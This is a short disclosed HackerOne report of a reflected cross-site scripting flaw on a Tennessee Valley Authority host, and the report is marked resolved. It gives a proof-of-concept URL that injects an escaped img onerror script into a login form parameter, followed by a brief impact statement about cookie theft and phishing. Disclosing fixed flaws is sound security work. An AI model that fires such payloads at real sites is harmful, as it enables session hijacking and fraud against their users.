xss reflected - pqm.tva.com

Disclosed: 2023-10-13 12:31:49 By thiagomarques To tennessee-valley-authority

Medium

Vulnerability Details

POC: https://pqm.tva.com/siteminderagent/forms/smpwservices.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7 ## Impact With the help of xss a hacker or attacker can perform social engineering on users by redirecting them from real website to fake one. hacker can steal their cookies and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.

Actions

View on HackerOne

Report Stats

Report ID: 1363001
State: Closed
Substate: resolved
Upvotes: 13

xss reflected - pqm.tva.com

Vulnerability Details

Actions

Report Stats

Share this report